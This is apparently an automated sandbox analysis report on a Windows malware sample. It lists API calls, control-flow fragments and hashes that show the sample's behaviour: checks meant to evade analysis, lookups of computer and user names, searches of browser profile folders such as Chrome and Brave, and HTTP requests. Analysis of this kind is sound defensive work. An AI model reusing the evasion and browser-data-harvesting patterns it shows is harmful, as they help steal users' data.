                                          • Part of subcall function 004178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0085A0F8,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416ACA
                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416AE8
                                        • CloseHandle.KERNEL32(00000000), ref: 00416AF9
                                        • Sleep.KERNEL32(00001770), ref: 00416B04
                                        • CloseHandle.KERNEL32(?,00000000,?,0085A0F8,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416B1A
                                        • ExitProcess.KERNEL32 ref: 00416B22
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$Process$Exit$Heap$AllocUserlstrcpy$CloseDefaultEventHandleName__aulldiv$ComputerCreateCurrentGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                        • String ID:
                                        • API String ID: 3511611419-0
                                        • Opcode ID: a82f2647c4da4d76ae5dd8bb4d1836cbc859188965f56a9e6d980b8cd40831b7
                                        • Instruction ID: 1c0ff58a553566d9d81a636820be0d4cb73d0efe44d476221655ae408a7450da
                                        • Opcode Fuzzy Hash: a82f2647c4da4d76ae5dd8bb4d1836cbc859188965f56a9e6d980b8cd40831b7
                                        • Instruction Fuzzy Hash: E1317074940208AADB04FBF2DC56BEE7339AF04344F10042EF102A61D2DF7C6986C6AE

                                        Control-flow Graph

                                        APIs
                                        • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                        • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                        • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                        • lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                        • InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ??2@$CrackInternetlstrlen
                                        • String ID: <
                                        • API String ID: 1683549937-4251816714
                                        • Opcode ID: 116f2b94f3778adbc9308d13d48d12011aa30bb27236a404a583900fa923c872
                                        • Instruction ID: 59ffd934fb977a93d501bba2862ecb1df6a0defd032b503e5e890a78b3955a81
                                        • Opcode Fuzzy Hash: 116f2b94f3778adbc9308d13d48d12011aa30bb27236a404a583900fa923c872
                                        • Instruction Fuzzy Hash: 712149B5D00219ABDF10DFA5E849BDD7B74FF04320F008229F925A7290EB706A15CF95

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1493 401220-401247 call 4189b0 GlobalMemoryStatusEx 1496 401273-40127a 1493->1496 1497 401249-401271 call 41da00 * 2 1493->1497 1499 401281-401285 1496->1499 1497->1499 1501 401287 1499->1501 1502 40129a-40129d 1499->1502 1504 401292-401294 ExitProcess 1501->1504 1505 401289-401290 1501->1505 1505->1502 1505->1504
                                        APIs
                                        • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                                        • __aulldiv.LIBCMT ref: 00401258
                                        • __aulldiv.LIBCMT ref: 00401266
                                        • ExitProcess.KERNEL32 ref: 00401294
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                        • String ID: @
                                        • API String ID: 3404098578-2766056989
                                        • Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                        • Instruction ID: f2ded3d157cb35307e0b39d430c96622be3dd75f8d5744ac0086d878f352425a
                                        • Opcode Fuzzy Hash: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                        • Instruction Fuzzy Hash: 5901FBB0D84308BAEB10DBE4DC49B9EBB78AB15705F20809EE705B62D0D6785585879D

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1507 416af3 1508 416b0a 1507->1508 1510 416aba-416ad7 call 41aad0 OpenEventA 1508->1510 1511 416b0c-416b22 call 416920 call 415b10 CloseHandle ExitProcess 1508->1511 1516 416af5-416b04 CloseHandle Sleep 1510->1516 1517 416ad9-416af1 call 41aad0 CreateEventA 1510->1517 1516->1508 1517->1511
                                        APIs
                                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0085A0F8,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416ACA
                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416AE8
                                        • CloseHandle.KERNEL32(00000000), ref: 00416AF9
                                        • Sleep.KERNEL32(00001770), ref: 00416B04
                                        • CloseHandle.KERNEL32(?,00000000,?,0085A0F8,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416B1A
                                        • ExitProcess.KERNEL32 ref: 00416B22
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                        • String ID:
                                        • API String ID: 941982115-0
                                        • Opcode ID: 7c87040c747da0acdc92787bbe7dfdf8e9b0063e40ee03b256faf14453658583
                                        • Instruction ID: 3c4b1c3760862ff095f4b16c882d5da3ff279df4080b6ba6633acb61265b60b7
                                        • Opcode Fuzzy Hash: 7c87040c747da0acdc92787bbe7dfdf8e9b0063e40ee03b256faf14453658583
                                        • Instruction Fuzzy Hash: E9F0BE34A84219AFE710EBE0DC06BFE7B35EF04381F11451AF502A11C0CBB8A581D65F
                                        APIs
                                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                          • Part of subcall function 00406280: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                          • Part of subcall function 00406280: StrCmpCA.SHLWAPI(?,00861C98), ref: 00406303
                                          • Part of subcall function 00406280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                          • Part of subcall function 00406280: HttpOpenRequestA.WININET(00000000,GET,?,00861180,00000000,00000000,00400100,00000000), ref: 00406385
                                          • Part of subcall function 00406280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                          • Part of subcall function 00406280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415228
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                        • String ID: ERROR$ERROR
                                        • API String ID: 3287882509-2579291623
                                        • Opcode ID: 287c4944f2ba1a5879c5b57656c8dc51a31da8e3a5e3b78fb2e1df7df1d21834
                                        • Instruction ID: 74302943fe5589af4790b43ef38c2dd3b69765dcd24c28c5b90e35499643ece9
                                        • Opcode Fuzzy Hash: 287c4944f2ba1a5879c5b57656c8dc51a31da8e3a5e3b78fb2e1df7df1d21834
                                        • Instruction Fuzzy Hash: 2D113330901008ABCB14FF61DD52AED7338AF50354F90416EF81A5A5D2EF38AB56CA9A
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                        • HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                        • GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocComputerNameProcess
                                        • String ID:
                                        • API String ID: 4203777966-0
                                        • Opcode ID: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
                                        • Instruction ID: 452d18c19ae851532a1d010ea63a4611fd0250a2e86211d30d2d96ca9096ca29
                                        • Opcode Fuzzy Hash: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
                                        • Instruction Fuzzy Hash: 220186F1A48204EFD700DF94DD45BAABBB8FB05B11F10425AF545E3280C37859448BA6
                                        APIs
                                        • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416A1C), ref: 0040112B
                                        • VirtualAllocExNuma.KERNEL32(00000000,?,?,00416A1C), ref: 00401132
                                        • ExitProcess.KERNEL32 ref: 00401143
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process$AllocCurrentExitNumaVirtual
                                        • String ID:
                                        • API String ID: 1103761159-0
                                        • Opcode ID: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
                                        • Instruction ID: 516f97497d3ee46bc55051264f2a31c9d8efacdbd59bd60d04d859dfb32d17c4
                                        • Opcode Fuzzy Hash: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
                                        • Instruction Fuzzy Hash: 76E08674985308FFE7106BE09C0AB0976B9EB05B05F101055F7087A1D0C6B826009699
                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00801951
                                        • Module32First.KERNEL32(00000000,00000224), ref: 00801971
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924882447.0000000000800000.00000040.00001000.00020000.00000000.sdmp, Offset: 00800000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_800000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CreateFirstModule32SnapshotToolhelp32
                                        • String ID:
                                        • API String ID: 3833638111-0
                                        • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                        • Instruction ID: 445d0a693f280b6e1c23857bfa55b2d729de309f0801734ceefa447b485758a5
                                        • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                        • Instruction Fuzzy Hash: 10F062366007146FDB602AF99C8DB6A7AECFF49734F500528E656E14C0DA70E8454661
                                        APIs
                                        • SetErrorMode.KERNEL32(00000400,?,?,022E0223,?,?), ref: 022E0E19
                                        • SetErrorMode.KERNEL32(00000000,?,?,022E0223,?,?), ref: 022E0E1E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorMode
                                        • String ID:
                                        • API String ID: 2340568224-0
                                        • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                        • Instruction ID: 53a1e4fbd78a44019b04391a038f3ae8355d6652015821f9a340369cd9bd9a6a
                                        • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                        • Instruction Fuzzy Hash: 97D0123115512877DB003AD4DC09BCD7B1CDF09B66F448021FB0DE9080C7B0964146E5
                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040114E,?,?,00416A1C), ref: 004010B3
                                        • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0040114E,?,?,00416A1C), ref: 004010F7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Virtual$AllocFree
                                        • String ID:
                                        • API String ID: 2087232378-0
                                        • Opcode ID: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
                                        • Instruction ID: e05e9ea69c75ff17789b13d2c0695db9e8f3777892ad192db41722de5b6306ee
                                        • Opcode Fuzzy Hash: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
                                        • Instruction Fuzzy Hash: F2F052B1681208BBE7109BA4AC49FABB3E8E305B14F301408F500E3380C5319E00CAA4
                                        APIs
                                          • Part of subcall function 004178E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                          • Part of subcall function 004178E0: HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                          • Part of subcall function 004178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                          • Part of subcall function 00417850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                          • Part of subcall function 00417850: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                          • Part of subcall function 00417850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                        • ExitProcess.KERNEL32 ref: 004011C6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$Process$AllocName$ComputerExitUser
                                        • String ID:
                                        • API String ID: 1004333139-0
                                        • Opcode ID: beae5ea4bba28d8bcdb6621297b085ccf5731606b7c52db2eb8bbe7634c0c08e
                                        • Instruction ID: 3272f285758621328f1ae990cc0b7bdad84480bea6fe4891c0ce75a2ed71569b
                                        • Opcode Fuzzy Hash: beae5ea4bba28d8bcdb6621297b085ccf5731606b7c52db2eb8bbe7634c0c08e
                                        • Instruction Fuzzy Hash: 72E0C2B999030123DB0433F2AD0AB6B329D5B0538DF04042EFA08D2252FE2CE84085AE
                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 00801639
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924882447.0000000000800000.00000040.00001000.00020000.00000000.sdmp, Offset: 00800000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_800000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                        • Instruction ID: e86a2758d322c8b5c2d0080c574f39f5623b53d59e9d60310f41e599b1a7fa96
                                        • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                        • Instruction Fuzzy Hash: 1D112D79A00208EFDB01DF98C989E98BBF5EF08350F058094F9489B361D371EA50DB90
                                        APIs
                                        • wsprintfA.USER32 ref: 004138CC
                                        • FindFirstFileA.KERNEL32(?,?), ref: 004138E3
                                        • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413935
                                        • StrCmpCA.SHLWAPI(?,00420F70), ref: 00413947
                                        • StrCmpCA.SHLWAPI(?,00420F74), ref: 0041395D
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00413C67
                                        • FindClose.KERNEL32(000000FF), ref: 00413C7C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                        • String ID: !=A$%s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                        • API String ID: 1125553467-817767981
                                        • Opcode ID: 8791cea4fdcc51078b83b32db4eaf7b09dc70f878dd535264430eb58c9f2cac6
                                        • Instruction ID: 6b32dcbabd2ae606338a05af88a65253e6d0136fcb4401239c8972690a9ca057
                                        • Opcode Fuzzy Hash: 8791cea4fdcc51078b83b32db4eaf7b09dc70f878dd535264430eb58c9f2cac6
                                        • Instruction Fuzzy Hash: 45A182B5A40218ABDB20DFA4DC85FEA7379BF45301F04458DB50D96181EB789B84CF66
                                        APIs
                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                        • FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2B,00000000,?,?,?,004213F4,00420B2A), ref: 0040BEF5
                                        • StrCmpCA.SHLWAPI(?,004213F8), ref: 0040BF4D
                                        • StrCmpCA.SHLWAPI(?,004213FC), ref: 0040BF63
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0040C7BF
                                        • FindClose.KERNEL32(000000FF), ref: 0040C7D1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                        • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                        • API String ID: 3334442632-726946144
                                        • Opcode ID: a41b6269a631387fa851cbf6a32e2d8bdc6a217aa0870606517bf66242e233e5
                                        • Instruction ID: 2d1308125da8926fdde3e90b6322e2b17ae592ee2aa58173b84b0ef8a3c681e1
                                        • Opcode Fuzzy Hash: a41b6269a631387fa851cbf6a32e2d8bdc6a217aa0870606517bf66242e233e5
                                        • Instruction Fuzzy Hash: 4E42B871910104ABCB14FB71DD96EED733DAF44304F40456EB50AA60C1EF389B99CBAA
                                        APIs
                                        • wsprintfA.USER32 ref: 0041492C
                                        • FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                        • StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                        • StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                        • FindClose.KERNEL32(000000FF), ref: 00414B92
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseFirstNextwsprintf
                                        • String ID: %s\%s$%s\%s$%s\*
                                        • API String ID: 180737720-445461498
                                        • Opcode ID: dd01fc369b5388c5bfb31bfe2d46f2fde17b2a46eb7854bc19da0db36a1e72aa
                                        • Instruction ID: f0ba0eb1991201f306808920aeaa9e90ed650eb79ad5a8a04d265ad4202cf965
                                        • Opcode Fuzzy Hash: dd01fc369b5388c5bfb31bfe2d46f2fde17b2a46eb7854bc19da0db36a1e72aa
                                        • Instruction Fuzzy Hash: E66175B5950218ABCB20EBE0DC45FEA73BDBB49700F40458DB50996181EB74EB85CF95
                                        APIs
                                        • wsprintfA.USER32 ref: 022F3B33
                                        • FindFirstFileA.KERNEL32(?,?), ref: 022F3B4A
                                        • lstrcat.KERNEL32(?,?), ref: 022F3B9C
                                        • StrCmpCA.SHLWAPI(?,00420F70), ref: 022F3BAE
                                        • StrCmpCA.SHLWAPI(?,00420F74), ref: 022F3BC4
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 022F3ECE
                                        • FindClose.KERNEL32(000000FF), ref: 022F3EE3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                        • String ID:
                                        • API String ID: 1125553467-0
                                        • Opcode ID: 4559a2751c43def235363665869aa0b92e5680d670ebeacc1df313f03f1736d8
                                        • Instruction ID: 952b6c6c87480ad450b957f1f740d4f13af54a33d405923b0fe96e5fa480afff
                                        • Opcode Fuzzy Hash: 4559a2751c43def235363665869aa0b92e5680d670ebeacc1df313f03f1736d8
                                        • Instruction Fuzzy Hash: F4A170B5A50218ABDB74DFE4CC84FEEB37ABF49300F444598A60D96144EB749B84CF62
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00414580
                                        • HeapAlloc.KERNEL32(00000000), ref: 00414587
